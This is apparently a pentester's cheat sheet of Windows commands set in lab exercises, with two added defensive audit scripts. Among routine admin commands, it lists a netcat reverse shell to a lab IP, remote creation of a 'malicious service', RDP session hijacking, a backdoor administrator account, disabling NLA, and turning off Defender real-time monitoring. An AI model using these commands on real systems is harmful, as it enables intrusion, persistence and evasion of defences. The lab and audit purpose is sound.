# Windows useful commands

### Generic useful Windows commands

#### Modify the Hosts File, access the Windows hosts file to modify hostname mappings:

```bash
# Run from an elevated (Administrator) prompt; the hosts file is not writable otherwise
echo 10.10.187.117 xx.local >> C:\Windows\System32\drivers\etc\hosts
```

#### Check User Privileges, display the privileges of the currently logged-in user:

```bash
whoami /priv
```

#### Check File Access Permissions, list the access control details for a specified file:

```bash
# Pass the file (or directory) whose ACL you want to see; the path below is a placeholder
icacls "C:\path\to\file"
```

#### Download a File from an HTTP Server

* In PowerShell, `wget` is an alias for `Invoke-WebRequest`; use it to download a file from a specified HTTP server and save it locally with `-OutFile`:

```bash
wget http://xxxxx/xxx -OutFile xx
```

#### Transfer Files between Virtual Machines

* Download a file onto a Windows machine from another VM (for example, your attack box). Start an HTTP server on the VM that holds the file, then use `wget` (the PowerShell alias for `Invoke-WebRequest`) on the Windows side to retrieve it; without `-OutFile` the response is returned as an object instead of being written to disk:

```bash
wget http://10.10.134.86:4444/exploit_me -OutFile exploit_me
```

*Note: Ensure the HTTP server is listening on the VM that serves the file before executing this command.*

#### Add a Local Windows User and Assign to Administrators

* Create a Windows user named "htb" with the password "abc123!" and add it to the administrators group:

```bash
net user htb abc123! /add
net localgroup administrators htb /add
```

#### Convert VHDX to VDI using VirtualBox

* Use VirtualBox's VBoxManage tool to convert a VHDX file to the VDI format:

```bash
# VBoxManage lives in the VirtualBox install directory (default path shown); --format VDI makes the target format explicit
"C:\Program Files\Oracle\VirtualBox\VBoxManage.exe" clonemedium disk "C:\Users\User\Documents\kali\kali-062024\KALI-JA\Virtual Hard Disks\Kali.vhdx" "C:\Users\User\Documents\kali\kali-062024\KALI-JA\Virtual Hard Disks\kali.vdi" --format VDI
```

### File shredding

Deleting files by simply removing them from your hard disk and the recycle bin is not enough: the files are not permanently deleted and can still be restored. There are different techniques to remove them permanently from your file system. You can overwrite the deleted data, or use a shredding tool that destroys the data.

Use the Windows built-in Cipher security tool to overwrite deleted data.

For example, the `cipher /w:E` command causes all deallocated space on drive E to be overwritten. Only free (deallocated) space is wiped; files that still exist are untouched, and the pass can take a long time on large volumes.

```
cipher /w:[DRIVELETTER]
cipher /w:E
```

Darik's Boot and Nuke ("DBAN") is a self-contained boot image that securely wipes hard disk drives (HDDs). DBAN is appropriate for personal use, bulk data destruction, or emergency data destruction for HDDs, but is not recommended for solid-state drives (SSDs), sanitization that requires auditable compliance documentation, or technical support.

Download link:

{% embed url="https://sourceforge.net/projects/dban/" %}

### RDP session hijacking via CMD

```bash
# RDP hijacking via CMD
# Example: take over a disconnected session. List sessions first; the ID (3) and the
# destination session name (e.g. rdp-tcp#0) come from the "query session" output.
query session
tscon 3 /dest:rdp-tcp#0
```

### Other useful PowerShell commands

```bash
# Find a keyword in the files under a directory
ls fatty-client\ -Recurse | Select-String "8000" | Select Path, LineNumber | Format-List

# Find .txt files in the current directory using PowerShell
Get-ChildItem *.txt

# Retrieve information on a specific installed package via WMI
Get-WmiObject -Class Win32_Product | Where-Object Name -Match TOSHIBA | Format-Table

# Get package info using Get-Package in PowerShell
Get-Package *TOSHIBA*

# Enable Remote Desktop Protocol via PowerShell
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -Name "fDenyTSConnections" -Value 0

# Allow Remote Desktop through Windows Firewall
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"

# Add a user to the Remote Desktop Users group
Add-LocalGroupMember -Group "Remote Desktop Users" -Member "username"

# Change a user's (e.g. the administrator's) password via CMD
net user USERNAME PASSWORD

# Disable Network Level Authentication (NLA) on a remote host via WMI to allow RDP without NLA
$TargetServer = "SCADA-SLAVE"
(Get-WmiObject -Class "Win32_TSGeneralSetting" -Namespace root\cimv2\terminalservices -ComputerName $TargetServer -Filter "TerminalName='RDP-tcp'").SetUserAuthenticationRequired(0)

# Disable NLA via the registry (UserAuthentication=0) to permit RDP without NLA
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-TCP" /v UserAuthentication /t REG_DWORD /d "0" /f

# Enable RDP via command line alongside firewall settings
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes

# Disable real-time monitoring of Windows Defender antivirus through PowerShell
Set-MpPreference -DisableRealtimeMonitoring $true

# Get help with a PowerShell cmdlet
Get-Help Get-Process

# If you want more detailed information, including examples, use:
Get-Help Get-Process -Detailed

# For the most comprehensive help, including parameter descriptions, use:
Get-Help Get-Process -Full

# And if you're looking for examples specifically, try:
Get-Help Get-Process -Examples
```
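As an added defender-side example (not part of the original page), the following PowerShell audit reads back the same settings the commands above change (fDenyTSConnections, UserAuthentication/NLA, the "Remote Desktop" firewall group, Remote Desktop Users membership, Defender real-time monitoring) and flags the weak values. It assumes an elevated session on the host being checked.

```powershell
# Added example (not from the original page): read back the RDP-related settings
# the commands above modify and flag the insecure values. Assumes an elevated
# PowerShell session on the host being audited.
$findings = @()
$tsKey  = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
$nlaKey = "$tsKey\WinStations\RDP-Tcp"

# fDenyTSConnections = 0 means RDP connections are accepted
$ts = Get-ItemProperty -Path $tsKey -ErrorAction SilentlyContinue
if ($ts -and $ts.fDenyTSConnections -eq 0) {
    $findings += 'RDP enabled (fDenyTSConnections=0): confirm this host should accept RDP.'
}

# UserAuthentication = 0 disables Network Level Authentication, exposing the logon
# screen to unauthenticated clients.
# Fix: Set-ItemProperty -Path $nlaKey -Name UserAuthentication -Value 1
$nla = Get-ItemProperty -Path $nlaKey -ErrorAction SilentlyContinue
if ($nla -and $nla.UserAuthentication -ne 1) {
    $findings += 'NLA disabled (UserAuthentication=0): re-enable it.'
}

# Enabled rules in the "Remote Desktop" firewall group allow inbound RDP
$fwRules = @(Get-NetFirewallRule -DisplayGroup 'Remote Desktop' -ErrorAction SilentlyContinue |
             Where-Object { $_.Enabled -eq 'True' })
if ($fwRules.Count -gt 0) {
    $findings += "Firewall allows RDP: $($fwRules.Count) enabled rule(s) in group 'Remote Desktop'."
}

# Unexpected members of Remote Desktop Users are a common persistence indicator
foreach ($m in @(Get-LocalGroupMember -Group 'Remote Desktop Users' -ErrorAction SilentlyContinue)) {
    $findings += "Remote Desktop Users member: $($m.Name) ($($m.ObjectClass))"
}

# Real-time protection switched off is exactly what the Set-MpPreference line above does
$mp = Get-MpPreference -ErrorAction SilentlyContinue
if ($mp -and $mp.DisableRealtimeMonitoring) {
    $findings += 'Defender real-time monitoring is disabled. Fix: Set-MpPreference -DisableRealtimeMonitoring $false'
}

if ($findings.Count -eq 0) { 'No RDP-related weaknesses found.' } else { $findings }
```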

### Create malicious service

```bash
# Get a reverse shell from Windows using netcat
runas /netonly /user:ZA.TRYHACKME.COM\t1_leonard.summers "c:\tools\nc64.exe -e cmd.exe 10.50.46.122 4443"

# Create and start a malicious service for a reverse shell
runas /netonly /user:ZA.TRYHACKME.COM\t1_leonard.summers "sc.exe \\thmiis.za.tryhackme.com create LOLIservice-3249 binPath= "%windir%\bad.exe" start= auto"
runas /netonly /user:ZA.TRYHACKME.COM\t1_leonard.summers "sc.exe \\thmiis.za.tryhackme.com start LOLIservice-3249"
```
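A service created the way shown above leaves a recognisable footprint: a binary outside the usual system directories, often auto-start, sometimes with an unquoted path or a file that no longer exists. The following PowerShell audit is an added example (not from the original page) that lists such services; it assumes local administrator rights and that `$trusted` is extended to match your own baseline.

```powershell
# Added example (not from the original page): list services whose binary runs from
# outside the usual system locations, from an unquoted path containing spaces, or
# from a file that is missing, the footprint an "sc.exe create ... binPath=" service leaves.
# Assumes local administrator rights; extend $trusted for your own baseline.
$trusted = @("$env:SystemRoot\", "$env:ProgramFiles\", "${env:ProgramFiles(x86)}\") |
           Where-Object { $_ -ne '\' }   # drop the empty entry on 32-bit hosts

function Get-ServiceBinary([string]$PathName) {
    # A quoted path ends at the closing quote; an unquoted one ends at the first ".exe"
    if ($PathName -match '^"([^"]+)"') { return $Matches[1] }
    if ($PathName -match '^(.+?\.exe)') { return $Matches[1] }
    return ($PathName -split ' ')[0]
}

$report = foreach ($svc in Get-CimInstance Win32_Service) {
    if (-not $svc.PathName) { continue }          # entries without a path
    $bin       = Get-ServiceBinary $svc.PathName
    $expanded  = [Environment]::ExpandEnvironmentVariables($bin)
    $inTrusted = [bool]($trusted | Where-Object { $expanded -like "$_*" })
    $unquoted  = ($svc.PathName -notmatch '^"') -and ($bin -match ' ')
    [pscustomobject]@{
        Name      = $svc.Name
        StartMode = $svc.StartMode
        State     = $svc.State
        Binary    = $expanded
        Untrusted = -not $inTrusted
        Unquoted  = $unquoted
        Missing   = -not (Test-Path -LiteralPath $expanded)
    }
}

# Only the rows worth a second look
$report | Where-Object { $_.Untrusted -or $_.Unquoted -or $_.Missing } | Format-Table -AutoSize
```

Review the flagged rows against the service's start mode and the account it runs under; a new auto-start service pointing at a user-writable directory is the case to investigate first.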

